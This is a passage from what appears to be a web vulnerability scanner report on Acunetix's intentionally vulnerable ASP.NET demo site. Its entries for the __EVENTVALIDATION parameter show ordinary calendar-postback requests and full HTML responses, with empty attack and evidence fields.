</HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8383&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDKJGbd2ghkZGTBwxaikGSOP11z7sBqcWSmlqVUzg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8uIX0CwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBA9FKfzJ6qDxxsA6b%2Fj17ociBIo9
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:39 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDKJGbd2ghkZGTBwxaikGSOP11z7sBqcWSmlqVUzg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8uIX0CwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBA9FKfzJ6qDxxsA6b/j17ociBIo9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="color:White;background-color:Silver;border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:White" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1101 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,101 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8398&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA%2FKAv6doIZGRkqDYdP%2BykyVAtXfMM1%2FDJIRBASwI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL97tCmBAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUaDqzWfcb4h5nG8XEuKOsPPT5sEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:56 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA/KAv6doIZGRkqDYdP+ykyVAtXfMM1/DJIRBASwI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL97tCmBAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUaDqzWfcb4h5nG8XEuKOsPPT5sEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:White" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
